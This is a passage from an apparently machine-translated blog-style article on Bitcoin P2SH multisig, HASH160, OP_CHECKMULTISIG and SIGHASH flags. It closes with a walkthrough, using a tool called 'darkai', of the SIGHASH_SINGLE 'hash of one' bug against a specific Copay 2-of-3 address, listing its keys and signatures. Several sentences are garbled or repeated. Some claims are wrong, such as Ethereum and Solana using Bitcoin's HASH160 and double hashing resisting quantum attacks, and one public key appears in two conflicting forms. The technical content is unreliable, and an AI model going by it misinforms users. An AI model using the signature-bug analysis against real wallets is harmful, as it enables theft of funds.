This result allows us to confirm that the funds are indeed at the output with the Pay-to-Script-Hash conditions.
Understanding the structure of such outputs is important for security analysis, developing complex allocation scenarios, and verifying spending conditions.
Using P2SH provides a secure and efficient mechanism for managing funds in the Bitcoin network, allowing for the creation of smart contracts and secure wallets.

The information received confirms that the second transaction output record ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577 stores the amount of 0.0035 BTC, controlled by a standard P2SH script with a hash160 value 06612b7cb2027e80ec340f9e02ffe4a9a59ba762. To manage these funds, it is necessary to present the corresponding redeem script, which provides a high level of security and flexibility in managing bitcoins.

Let’s confirm the scriptSig decryption:

OP_FALSE 304502... 304602... 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae

Let’s run the command to get HASH160 Bitcoin developers have set a standard for a 20-byte hash (hex) which is widely used without changes in other popular cryptocurrencies such as Bitcoin (BTC), Ethereum (ETH), Tether (USDT), BNB (BNB), Solana (SOL), XRP (XRP), Cardano (ADA), Dogecoin (DOGE), USDC (USDC), Polkadot (DOT), Avalanche (AVAX), Shiba Inu (SHIB), Stellar (XLM), TRON (TRX), Chainlink (LINK), Litecoin (LTC), Bitcoin Cash (BCH), Monero (XMR) to denote the shortened identifier of scripts and public keys.

Let’s run the command:

!./darkai -hexdata 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae

Processing process:

The original string, represented in hexadecimal format, is converted into a sequence of bytes (decoded from hex to binary format). This sequence is a serialized script (redeem script) or a similar structure of a bitcoin script.
The received bytes are hashed using the SHA-256 (one-shot hash) algorithm, the result of which is then processed by the RIPEMD-160 cryptographic function.
The resulting RIPEMD-160 hash of the SHA-256 binary data is obtained as a string:

06612b7cb2027e80ec340f9e02ffe4a9a59ba762

This 20-byte hash (hex) is called HASH160 and is widely used in Bitcoin to denote a shortened identifier for scripts and public keys.

Meaning and context of the result

The RIPEMD-160(SHA-256(data)) hashing process , known as HASH160, is the standard for creating addresses and scripts in Bitcoin, including P2SH (Pay-to-Script-Hash). HASH160 provides a unique and compact identifier that saves space on the blockchain.
The use of double hashing (SHA-256, then RIPEMD-160) combines the strong cryptographic properties of both functions: collision resistance, one-wayness, and attack resistance.
The resulting hash corresponds to the script hash of the redeem script – that is, the script that controls access to funds locked at the P2SH address.
In particular, this HASH160 appears in the locking script (scriptPubKey) of the outputs of specific transactions, which requires that the original redeem script itself with the same hash and correct signatures be provided when spending.

Technical details and explanations

Bitcoin has a concept of double hashing SHA-256 and RIPEMD-160 to protect addresses and scripts.
Using HASH160 instead of a simple 256-bit SHA-256 output reduces the hash length from 32 bytes to 20 bytes, which reduces the storage and data size on the network.
HASH160 is used to generate mainly P2SH addresses and legacy P2PKH addresses.

A key step in processing Bitcoin scripts using cryptographic hash functions.
Converting serialized scripts or public keys to HASH160 allows for efficient identification, indexing, and protection of data on the Bitcoin blockchain.

Received hash:

{'06612b7cb2027e80ec340f9e02ffe4a9a59ba762'}

The team has produced the exact hash that serves as the link between complex scripts and the compact format used to store and verify transactions on the Bitcoin network.

Why Satoshi Chose Double SHA-256 and How It Affects Cryptographic Strength

Satoshi Nakamoto chose to use SHA-256 double hashing (that is, applying SHA-256 twice in a row) in Bitcoin’s hashing algorithms for several important reasons that enhance the cryptographic strength and security of the network.

Reasons for choosing dual SHA-256

Improving resistance to various attacks
A single application of SHA-256 already has high cryptographic resistance, is resistant to collisions and preimages. However, double application of the hash function – first SHA-256 to the original data, then SHA-256 to the result – further complicates the analysis and attacks on the hash.
This reduces the probability of successfully selecting a collision or reverse recovery of the original data, makes it more labor-intensive to select various options and protects against weaknesses that are possible in specific implementations of the algorithm.
Protection against input data length issues
Double SHA-256 provides an additional layer of preventative security by taking into account the behavior of internal hash construction and the handling of padding bits in the data markup. This minimizes potential attacks related to data formatting.
Following Good Cryptographic Practices
Double hashing is a well-established security technique in a number of cryptographic protocols. For example, checksums and digital signatures use double encryption or double hashing. This increases the strength of the security chain.
Proven Security and Wide Support
SHA-256 is a member of the SHA-2 family developed by the U.S. National Security Agency (NSA) and published by the National Institute of Standards and Technology (NIST). This algorithm is considered one of the most secure today, and its dual use provides maximum security.

How does this affect cryptographic strength?

Collision and Preimage Resistance
Each of the SHA-256 rounds is highly collision resistant—it is extremely difficult to find two inputs with the same hash. Double hashing enhances this guarantee because an attacker must find a collision for two consecutive SHA-256s, which significantly increases the computational complexity.
One-way function with avalanche effect
Double application enhances the “avalanche effect”, where the slightest change in the input data causes a radical change in the output hash, making it difficult to detect patterns and reverse engineer.
Enhanced Cryptanalysis Resistance
Double SHA-256 protects against potential implementation weaknesses or unexpected vulnerabilities that could be discovered in a single iteration, minimizing the risk of attacks using quantum or classical computing tools.
Applicability to Proof-of-Work and Blockchain Security
The PoW mechanism in Bitcoin relies on calculating block hashes that must satisfy a certain difficulty. Double hashing creates an additional barrier to block forgery, increasing the reliability and trust in the blockchain 5 .

Dual use SHA-256is a deliberate choice by Satoshi Nakamoto to provide an additional layer of security and robust cryptographic strength to the entire Bitcoin system. This design minimizes collision risks, enhances one-wayness, and securely protects data on the blockchain network, creating a solid foundation for transaction security and consensus in the system. Thus, dual SHA-256 is a key element of the Bitcoin architecture, combining advanced cryptographic techniques with a distributed system.

Multi-signature in Bitcoin: the role of redeemScript and the OP_CHECKMULTISIG instruction

The security and flexibility of modern Bitcoin transactions is based on a scripting system that allows for complex conditions for spending funds. One of the key mechanisms is multisignature (multisig) , when funds can only be spent if there are several valid digital signatures from a set of possible ones. In this article, we will take a detailed look at how exactly this is implemented in Bitcoin, what redeemScript is, how the OP_CHECKMULTISIG instruction works , and why such an approach is in demand.

What is redeemScript?

In the context of Bitcoin, a redeemScript is a script containing the conditions for spending funds, which are stored in the transaction output in Pay-to-Script-Hash (P2SH) format. Instead of storing the full script on the blockchain, the redeemScript hash is stored in the output, saving space and hiding the details of the conditions until the time of spending.

RedeemScript can include, for example, multiple public keys and a threshold number of signatures – this is what multi-signature wallets implement.

How does OP_CHECKMULTISIG work?

Let’s consider the OP_CHECKMULTISIG instruction: purpose and operation, where the main element in redeemScript implementing the multi-signature check is OP_CHECKMULTISIG .

The instruction receives two groups of data from the stack as input:
- N public keys (e.g. three public keys)
- M signatures (e.g. two signatures), where M ≤ N is the required threshold of signatures to confirm the transaction.
To validate a transaction, OP_CHECKMULTISIG checks that each of the M signatures is correctly signed by any of the N public keys.
If all signatures are valid and match the keys in the redeemScript, the statement returns true , allowing the funds to be spent.

Features and bug with removing an element from the stack

Due to a historical bug in the implementation of OP_CHECKMULTISIG , one extra element, an unused value, is removed from the stack during execution. To avoid this problem, scriptSig uses a special element OP_FALSE(value 0) at the beginning, which compensates for this bug and prevents potential vulnerabilities.

Next we will look at the implementation of OP_CHECKMULTISIG , which removes one additional element from the stack. Using this bug, the attacker compensates for OP_CHECKMULTISIG as a potential vulnerability.
Thus, the scriptSig structure for multi-signature looks something like: where the first element of the script is a dummy .OP_FALSE <signature1> <signature2> ... <redeemScript>OP_FALSE

Practical example: multi-signature 2 of 3

Based on the redeemScript code:

023927... 03d2c0... 03ec01... 3 OP_CHECKMULTISIG

There are 3 public keys declared here .
The threshold is 2 signatures out of these three are required for successful verification.
The operation OP_CHECKMULTISIGchecks that the two provided signatures (in scriptSig) correspond to two of the three keys and are valid.
OP_FALSEin scriptSig compensates for the bug of removing the extra value.

The Importance and Benefits of Multi-Signature Wallets

Increased security. The wallet owner can distribute control over funds between several people or devices, eliminating the possibility of a single unauthorized spending.
Flexibility. Various schemes can be implemented, for example, “2 out of 3”, “3 out of 5”, with different conditions.
Legal efficiency: Multi-signatures are often used in corporate environments to ensure shared asset management.

Technical and practical context

Multi-signature scenarios are widely used in P2SH and SegWit transactions.
The OP_CHECKMULTISIG instruction is one of the most resource-intensive operations in the blockchain, as it requires checking multiple signatures. There is a protocol-level limit on the number of signal operations (sigops) per block.
Despite the history with OP_FALSE, the mechanism has proven its reliability and has found wide application.

RedeemScript with the OP_CHECKMULTISIG instruction is a complex and powerful tool in the Bitcoin arsenal that allows you to create multi-signature wallets with a signature threshold, providing a high level of security and control over funds. This mechanism has become a cornerstone for organizations, users and services that want to use shared management of their assets in a decentralized and secure environment. Thus, multi-signature via redeemScript and OP_CHECKMULTISIG is not just a technology, but a functionality that expands the capabilities of the classic cryptocurrency model.

How Bitcoin Multisig Verification Mechanism Works with OP_CHECKMULTISIG and redeemScript

The Bitcoin multi-signature verification mechanism is based on the use of special scripts with the OP_CHECKMULTISIG and redeemScript instructions , which allows for threshold signature matching, providing increased security and shared management of funds.

Basics of the multi-signature mechanism

Multisig is a system in which multiple valid signatures from a given set of public keys are required to complete a transaction. A typical scheme is denoted as m of n — for example, “2 of 3,” where any two signatures from three keys are needed to authorize a spend.

In Bitcoin, this logic is implemented through:

redeemScript — a script that describes the conditions for spending funds. It contains a list of public keys and a threshold parameter (m).
scriptSig – the unlock script, which includes the signatures required for verification, and the redeemScript itself.

How redeemScript works

The instruction OP_CHECKMULTISIGchecks that the provided scriptSigsignatures are valid and match the published public keys from redeemScript.

RedeemScript is structured something like this:

OP_M <pubkey1> <pubkey2> ... <pubkeyN> OP_N OP_CHECKMULTISIG

OP_Mand OP_N— instructions specifying the number of required signatures and the total number of public keys, respectively (for example, OP_2 and OP_3).
<pubkeyX>— public keys of participants.
OP_CHECKMULTISIG— an operator that implements multi-signature verification.

It takes as input several signatures and a set of public keys.
To verify successfully, each signature must correctly match one of the specified public keys.
The operation returns true if the number of valid signatures reaches the threshold m.

An important technical feature is a historical implementation bug OP_CHECKMULTISIGthat causes an extra, unused element to be removed from the stack. To compensate for this bug, scriptSiga value OP_FALSE(code 0) is placed at the beginning to “lock” the stack shift.

How the scriptSig structure works

For a wallet with a multi-signature “2 of 3”, before spending funds, it is formed scriptSigas follows:

OP_FALSE <signature1> <signature2> <redeemScript>

OP_FALSE— a dummy value to compensate for the OP_CHECKMULTISIG bug.
<signature1>and <signature2>– two digital signatures authorized by the owners of the corresponding private keys.
<redeemScript>— the script itself with public keys and verification parameters.

When verifying a node transaction:

Extracts redeemScript from scriptSig.
Hashes it and compares it with the hash stored in the locking script (scriptPubKey) of the previous output (P2SH format – OP_HASH160 <redeemScript hash> OP_EQUAL).
If the hashes match, deserialize redeemScript.
Executes the OP_CHECKMULTISIG statement, comparing signatures and keys for a match.
Returns true if the checks are successful.

If all inputs of a transaction pass this check, the transaction is considered valid. With such validity, by executing the operator of this bug, the attacker compensates for OP_CHECKMULTISIG as a potential vulnerability.

Multi-signature mechanism via redeemScript and OP_CHECKMULTISIG

Increased security: Multiple private key holders must agree to conduct a transaction, reducing the risk of theft if one key is compromised.
Flexibility and scalability: You can set an arbitrary threshold of signatures (from 1 to 15), as well as a list of participants – from 2 to 15 public keys.
Collective Asset Management: Suitable for corporate accounts, joint wallets, DAO, allowing for robust access control.
Transparency and Verifiability: All necessary data and conditions are in the blockchain, and verification of transactions is automatic, decentralized and transparent.

The Bitcoin multi-signature verification mechanism using the command OP_CHECKMULTISIGand redeemScript allows for complex threshold signature schemes to be set up, and by executing this bug operator, an attacker compensates for OP_CHECKMULTISIG as a potential vulnerability in controlled transactions in the Bitcoin distributed network.

What are the features and limitations when OP_CHECKMULTISIGchecking multiple signatures? Let’s look at the key aspects and limitations:

The signature verification threshold
OP_CHECKMULTISIG allows you to specify the number of required signatures T out of the total number of public keys N (the “T out of N” scheme). For example, 2 out of 3. For a transaction to be valid, it is enough to have T valid signatures .
Verify multiple signatures in one operation
Unlike single signature verification (OP_CHECKSIG), OP_CHECKMULTISIG verifies multiple signatures at once, correlating them with the corresponding public keys, which increases the efficiency and convenience of implementing multi-signature wallets.
Using redeemScript for a spend condition
In the P2SH format, the multi-signature scheme is hidden under the redeemScript hash – a full script with public keys and parameters. To spend the funds, the user must present the redeemScript and the corresponding signatures.
Historical bug – extra element in stack
OP_CHECKMULTISIG has the feature of removing an extra, unused element from the stack during execution (an “off-by-one” implementation bug). To compensate, a dummy element is added to scriptSig OP_FALSEat the beginning to properly align the stack. This is a recognized and accepted feature by the community.

OP_CHECKMULTISIG Limitations

Maximum number of keys and signatures
Bitcoin has a limit of 15 public keys and, accordingly, 15 signatures in a redeemScript. This is due to the limit on the script size (~520 bytes) and the number of operations allowed for verification per block (sigops limit).
Increased transaction size and fees
Multi-signature transactions are larger due to the large number of public keys, signatures, and additional redeemScript data. This increases the size of the transaction itself and, as a result, the fee for processing it.
Script size limits
The maximum size of each script (input or output) is limited to 520 bytes. With a large number of keys, redeemScript becomes cumbersome, which affects the convenience and efficiency of using multi-signature.
Hiding spending conditions only when using P2SH
If P2SH is not used, the correct script with public keys and OP_CHECKMULTISIG is stored openly in the transaction outputs, which reveals the public keys in advance, reducing privacy.
Lack of native support for complex logic
Bitcoin Script is incomplete and limited in capabilities, there are no cycles and recursion, which is why complex political or contractual conditions of multi-signatures are implemented in a limited way.

Types of Signatures in Bitcoin: Features and Role of SIGHASH Flags

Bitcoin uses digital signatures to authorize transactions, allowing owners of funds to confirm their right to dispose of them. The peculiarity is that signatures can limit their scope of action not to the entire transaction, but only to a part of it. This is implemented using special flags – SIGHASH , which determine which transaction data exactly falls under the signature. Let’s consider the types of signature hashes, their purpose, examples of use, as well as features that arise in non-standard situations.

When signing a Bitcoin transaction, a digital signature is created that is formed over a specific fragment of transaction data. It is through the SIGHASH flag that it is indicated what part of this data this signature should cover. The signature hash type is transmitted by the last byte of the signature itself and determines the area included in the hash, and therefore in the signed section. This allows for flexible formation of conditions for what specific actions on the transaction are approved by the signer.

The main three types of SIGHASH

1. SIGHASH_ALL (0x01)

This is the default signature type in most wallets and clients. The signature covers all inputs and all outputs of the transaction , which means:

The signer confirms this particular combination of sources and addressees.
Any change to the inputs or outputs after signing invalidates the signature.
Provides the highest level of transaction security and predictability.

2. SIGHASH_NONE (0x02)

With this signature type, all inputs are signed, but none of the outputs are signed :

The signatory agrees to use the listed inputs, but does not commit to specific outputs.
This allows you to change the outputs of a transaction without having to re-sign the inputs.
This approach is not secure for single inputs and is more often used in specific scenarios, such as complex smart contracts or cooperative transactions.

3. SIGHASH_SINGLE (0x03)

This signature type signs all inputs, but only one output – with the same sequence number as the input :

That is, the signature is limited to the pair “input N – output N”.
Allows the signer to control a specific input-output pair while ignoring the rest.
Helps create partial or conditional dispositions of funds.
However, there may be a problem if there is no output with the input index – in this case, a hash with a value of one is returned (which is a known bug described below).

Example from a real transaction

Consider a transaction with three inputs, where signatures ending with a byte 0x03pointing to SIGHASH_SINGLE have been extracted from the signature scripts (scriptSig) of two of them — that is, signatures that sign only the pair of corresponding inputs and outputs. However, here we observe a situation: the input with index 2 does not have a corresponding output with the same index.

Digital Signature Forgery Attack Various vulnerability assessment methods are used to prevent crypto incidents and improve the cybersecurity of cryptocurrency platforms

791fe035d312dcf9196b48649a5c9a027198f623c0a5f5bd4cc311b8864dd0cf

Raw Transaction

What happens if there is no exit below the entry index?

Due to a historical Bitcoin bug, in such situations the transaction hash for signing is returned as a fixed number – one (int 1). This does not correspond to a valid hash of the transaction being signed and can create security and compatibility issues.

Additional flags and modifiers

In addition to the three basic SIGHASH values, combinations of these values are possible with the SIGHASH_ANYONECANPAY flag , which allows only one input to be signed, leaving the others open for modification. This expands the possibilities for creating complex collaborative protocols and multi-party transactions, where different participants sign only their parts.

Practical significance and application

SIGHASH_ALL provides the most complete confirmation of a transaction and is used in standard wallets.
SIGHASH_NONE and SIGHASH_SINGLE allow for more flexible and partial signatures used in complex scenarios: multi-signatures, smart contracts, trusted transactions.
Understanding these types is critical for developers and analysts creating custom transactions or investigating bugs/vulnerabilities.

Types SIGHASH are Bitcoin a clever mechanism for managing the level of control and scope of digital signatures within transactions. They strike a balance between security, flexibility, and compatibility. The story includes unexpected complications, such as the bug with SIGHASH_SINGLE no corresponding output, which highlights the importance of a deep understanding of the technical details to successfully work with Bitcoin at an advanced level.

How do the differences between SIGHASH_ALL, NONE and SINGLE affect the security of Bitcoin transactions?

The differences between the SIGHASH_ALL, SIGHASH_NONE, and SIGHASH_SINGLE signature types have a significant impact on the security of Bitcoin transactions because they determine which parts of the transaction are kept within the digital signature and therefore protected from modification.

1. SIGHASH_ALL – maximum security

Description: Signing covers all inputs and all outputs of a transaction .
Impact on safety:
- Ensures that no input or output can be modified after signing.
- Eliminates the possibility of substituting the recipient or the payment amount.
- The signatory has full control over the final outcome of the transaction.
Risks: High rigidity – if you need to change anything (for example, add an output or increase the commission), you need to re-sign.

2. SIGHASH_NONE – open outputs, closed inputs

Description: All inputs are signed, and all outputs are left unsigned .
Impact on safety:
- Signature inputs are protected, but outputs can be changed by anyone after signing.
- Abuse potential: An attacker can change the addresses and amounts of a transfer after signing.
Usage: Rarely used, mainly in trusted collaboration protocols and cooperative scenarios.
Risks: If an attacker gains access to signatures, they can send funds to their addresses without the signatory’s consent.

3. SIGHASH_SINGLE — signature of the corresponding input and output

Description: Signs all inputs, but only the output with the same index as the input signature .
Impact on safety:
- Allows the signer to control only one specific output, while the others remain modifiable.
- If the number of outputs is less than the number of inputs, a bug occurs: for a missing output, the hash is 1, which can lead to vulnerabilities.
- Allows for more flexible distribution of funds management, but such flexibility comes with a reduction in the guarantees of safe spending.
Risks:
- Possibility of replacing or removing uncovered outputs.
- Not suitable for transactions where it is important to keep the entire payment logic unchanged.

The final impact

Type Sighash	What is being signed?	Security level	Possible risks	Application
SIGHASH_ALL	All inputs and outputs of the transaction	Maximum – no changes at all	Requirement for change (need to re-sign the transaction)	Standard for most payments
SIGHASH_NONE	All ins, no outs	Medium – outputs are not protected	Substitution of outputs, loss of control over recipients	Cooperative scenarios, multi-signature
SIGHASH_SINGLE	All inputs, output with index corresponding to input	Low – only one output will be protected	Bug in the absence of the corresponding output, partial substitution	Partial payments, complex scenarios

The choice of SIGHASH type directly affects the degree of trust in a transaction in the Bitcoin cryptocurrency network:

SIGHASH_ALL provides the highest level of security , which is why it is widely used for most transactions.
SIGHASH_NONE and SIGHASH_SINGLE provide flexibility and partial signing , which can be useful in certain cases, but also increases the risks of spoofing and abuse.
Understanding these differences is critical when designing multi-signature schemes, complex protocols, and Bitcoin smart contracts, where the balance between flexibility and security must be carefully balanced.

How Misuse of SIGHASH_ALL Can Lead to Vulnerabilities in Transactions

Incorrect use or lack of correct implementation of SIGHASH_ALL in Bitcoin transaction signatures can lead to serious vulnerabilities affecting the security of funds and the integrity of the system. The key aspects of these vulnerabilities are:

Signature Malleability:
Although SIGHASH_ALL implies that all inputs and outputs of a transaction are signed, due to the nature of the ECDSA algorithm it is possible for the same transaction to have multiple different, but valid signatures. This is because the signature component s can take equivalent values. An attacker can modify the signature without changing the contents of the transaction, which causes the transaction identifier (txid) to change. This makes it difficult to track transactions, makes replay attacks difficult, and can be used for fraud or double spending.
DeserializeSignature Errors:
If the signature verification function (including SIGHASH_ALL) does not handle the signature structure correctly, such as checking that r and s are within the allowed ranges and not zero, this allows attackers to create invalid but accepted signatures. Such forged signatures can be used to authorize unauthorized transactions, steal funds, double-spend, and corrupt the blockchain.
Insufficient validation of signature parameters:
Incorrect or incomplete validation of a signature with the flagSIGHASH_ALL, such as ignoring or incorrectly handling the trailing byte, can result in transactions with incorrect coverage of the elements being signed (inputs and outputs) being validated. This opens the door to attacks in which an attacker manipulates parts of a transaction to disable protection or escalate their privileges.
Replay attacks and transaction collision:
Due to the possibility of changing a signature without changing the contents of a transaction (see Signature Malleability ), a single transaction can be reused or a collision created, creating the risk of double spending or financial loss.

Thus, incorrect use SIGHASH_ALLor errors in the implementation of its verification significantly undermine the security of the Bitcoin network, allowing attackers to manipulate signatures and transactions. To combat these vulnerabilities, strict checks of the format and ranges of signatures are being implemented, improved protocols are used (for example, SegWiteliminating some of the problems with signature variability), and secure methods of signing and validating transactions are being standardized.

An invalid signature with the SIGHASH_ALL type increases the risk of double spending in Bitcoin for the following reasons:

When using SIGHASH_ALL, the signature covers all inputs and outputs of the transaction, ensuring that no element of the transaction can be changed after signing. However, if the signature is formed incorrectly, for example due to errors in the random number generation or the formation of the signature parameters (r, s) themselves, this may lead to the fact that part of the transaction can be changed without invalidating the signature. In particular, a vulnerability arises in which an attacker can change individual fields or the structure of the transaction, creating variations that are accepted by the network as valid, but differ from the original.

This signature malleability allows attackers to create alternative versions of a transaction with a different identifier ( txid), making it difficult to track and confirm payments, and in some cases leading to the reuse of the same inputs – i.e. double spending.

Additionally, if the signature validation implementation does SIGHASH_ALLnot strictly check the correctness of the signature parameters and data format, an attacker can issue fake signatures or exploit protocol bugs to bypass the checks. This leaves an open opportunity for manipulation and creation of conflicting transactions.

Thus, to reduce the risk of double spending, it is critical to correctly generate and validate signatures with SIGHASH_ALL, apply protection methods signature malleability(e.g. SegWit), and update software and follow security recommendations. This ensures that the signature is anchored to the entire transaction structure, ensuring its immutability and resistance to abuse.

Let’s get information about the public keys associated with a Bitcoin address 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe. Below is a detailed and informative analysis of the data obtained.

!./darkai -pubkey 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

Received public keys:

The team’s work resulted in a list of three public keys extracted in compressed format (compressed public key), presented in hexadecimal form:

pubkey = [
  '023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d9f359e37e39f0561196',
  '03d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b80',
  '03ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df'
]

Public Keys: Each element is a user’s public key in compressed public key format, 33 bytes long. Compressed keys typically begin with a prefix 02or 03, indicating the sign of the point’s (Y) coordinate on the elliptic curve, followed by 32 bytes of the X coordinate.
Link to address: A Bitcoin address is a hash of a script or public key. In this case, the address 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCecorresponds to some P2SH (Pay-to-Script-Hash) or multi-signature address, which is characterized by storing several public keys at once in a redeemScript. The list of public keys corresponds to the set embedded in this safe.

A set of several public keys is a classic situation for a multisig wallet. In this case, to spend funds, several signatures from the corresponding private keys are required:

This list of public keys allows you to determine which keys have the right to sign transactions with this address.
Typically, a multi-signature is formed according to the M-of-N scheme, for example, 2 out of 3, where Nis the total number of keys, and Mis the minimum number of signatures required for spending.

Using multiple keys increases security because compromising one key does not result in loss of control over funds.
Each public key can be verified individually or in combination to confirm the validity of the signatures.

Compressed public keys

The compression principle allows to reduce the length of the public key from 65 bytes (non-compressed format) to 33 bytes, which saves space in transactions and blocks.
The compressed key contains information about the X-coordinate of the point on the elliptic curve and the sign of the Y-coordinate.

Usage in redeemScript

In the context of multisig, these public keys are typically included in redeemScript, which is used in P2SH scenarios.
To confirm the right to spend funds, it is necessary to provide signatures corresponding to the minimum required number of keys from this set.

A Bitcoin address 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCeis associated with three specific public keys in a compressed key format. This is typical for multi-signature Bitcoin addresses, where signatures using some or all of these keys must be provided to authorize a spend, providing a high level of security and flexibility in managing funds.

For a deeper analysis and understanding of the parameters, you can further study:

The specific redeemScript format this set of private and public keys is associated with.
Signature policy (how many of these three signatures are required).
The history of transactions associated with this address.

Public keys 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

The public key 023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f0561196is one of the elements used in the BitPay Copay multi-signature wallet , which was the target of an attack involving a vulnerability in the handling of the SIGHASH_SINGLE signature type.

This public key, along with two others ( 03d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b80and 03ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df), is part of the redeemScript of the Copay wallet, which is a 2-of -3 multi-signature wallet . To spend funds from such an address, you must provide two valid signatures and the redeemScript.

RedeemScript, which contains these three public keys, yields the following instructions when decoded: 2 <pubkey1> <pubkey2> <pubkey3> 3 OP_CHECKMULTISIG. This means that two signatures out of three possible keys are required to verify the multisig. OP_CHECKMULTISIGchecks each signature/public key pair for validity, ensuring that all signatures match one of the public keys. The OP_FALSE instruction in scriptSig is required due to a known bug where OP_CHECKMULTISIG removes an extra unused value from the stack.

The Copay wallet developed by BitPay has been attacked, the details of which were disclosed by Coinspect. The attack exploited the SIGHASH_SINGLE signature type, which only signs the corresponding input and output (the output with the same index as the input). If an output with that index does not exist, the integer value “one” will be returned as the transaction hash, which is a known bug that OP_CHECKMULTISIG checks the authenticity of two signatures from three public keys.

This multi-signature set has come into the spotlight due to a vulnerability discovered by Coinspect. The vulnerability is related to the way transactions use a signature type SIGHASH_SINGLE (0x03), in which the signature covers all inputs and exactly one output of the transaction with an index that matches the index of the input. It is important to note that if there is no output with such an index (and in some cases there are fewer of them than inputs), due to a Bitcoin bug, the hash for the signature is returned as an integer “1”. This allows transactions to be created that spend outputs without knowledge of the private keys, which opens the door to theft of funds from the multi-signature wallet.

Thus, the public key 03d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b80 is a key component of the vulnerable Copay multi-signature wallet, whose participation in the composite redeemScript provides certain security benefits, but has also become the subject of experiments and attacks illustrating the importance of correctly handling all types of signatures in Bitcoin.

The Important Role of redeemScript and Multi-Signature

The public key 03d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b80 is part of the redeemScript, which specifies the conditions for spending funds from a particular transaction output and has the following general format:

2 <pubkey1> <pubkey2> <pubkey3> 3 OP_CHECKMULTISIG

Where this key occupies one of the places <pubkeyN>. The instruction OP_CHECKMULTISIG checks that the signatures provided when spending the funds are correct and correspond to at least two of the three public keys.

This public key, along with two others, defines a list of authorized owners to jointly manage funds in the Copay multi-signature wallet, which has demonstrated a known vulnerability related to improper handling of the signature type SIGHASH_SINGLE. The vulnerability allows attackers to create transactions with incorrect hashing, which is caused by a bug in the Bitcoin protocol when there is no corresponding output for an input with a certain index. This has led to possible attacks on wallets, including Copay.

The public key 03ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df is a key element of the security and flexibility of the Copay multi-signature wallet. It serves to jointly control funds and requires joint confirmation of transactions along with other keys in the set. At the same time, the vulnerability in question became an important example of the need for strict verification and updating of signature mechanisms in cryptocurrency systems.

Let’s execute the command in which we will receive two processed digital signatures in DER format, associated with the specified Bitcoin address:

!./darkai -decodesig 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

As a result, we get the result:

decodesig = [der_decode_sig('3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903'), der_decode_sig('304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803')]

Decrypting digital signatures

The variable sigsstores two decrypted signatures obtained through the function der_decode_sigfrom their DER-encoded form:

First signature:

3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903

Second signature:

304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803

The DER (Distinguished Encoding Rules) format is a standard way of encoding structures for ECDSA signatures in Bitcoin, which guarantees a unique and correct representation of the signature parameters r and s.

The hash used for verification

The hash was used to verify the signature:

\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

It is a 32-byte sequence where the first byte is 0x01, and the rest are zeros. In the context of Bitcoin, such a hash serves as an example or test value that is compared with the original transaction hash to verify keys.

Verification of signature authenticity

Verification was performed by the function ecdsa_raw_verify(hash, signature, public_key), which checks whether the digital signature matches the specified hash and public key.

In the example provided:

The first signature is valid for the first public key ( pubs), as confirmed by the returned value True.
The second signature is valid for the second public key ( pubs[1]), also confirmed by True.

This means that these signatures were actually created by the owners of the corresponding private keys and correctly match the given hash.

Vulnerability as a Meaning in the Context of an Outcome

Possibility of errors and vulnerabilities: It is important to ensure that signatures are formed correctly – in particular, the low value rule is followed s, which prevents signature malleability issues and ensures consensus on the network (see BIP 62).
Ownership Guarantee: Successful verification of a digital signature proves ownership of the corresponding private key – only its owner can create a valid signature. This is the basis of Bitcoin security, preventing unauthorized spending.
DER and Standards: The use of DER encoding and explicit indication of the signature type (including the SIGHASH flag, which determines which part of the transaction the signature is signed) complies with Bitcoin protocol standards.

Technical details about the Bitcoin signature process

Transaction hashing: The signature is formed not over the entire transaction, but over its hash, which includes parts of the transaction depending on the SIGHASH flag.
ECDSA Signatures: Bitcoin uses the Elliptic Curve Digital Signature Algorithm (ECDSA) to create signatures that provide cryptographic security.
Parameters r and s: The signature consists of two numeric parameters rand s. These parameters are packed into DER format for serial transmission or storage.
Signature verification: Network nodes verify signatures to ensure that the spending of funds is authorized.

The resulting digital signatures were successfully decoded and verified for correctness using public keys and a standardized hash. This confirms their authenticity, as well as the correctness of the signature generation process in accordance with the Bitcoin protocol.

Bitcoin SIGHASH_SINGLE signature vulnerability and its consequences

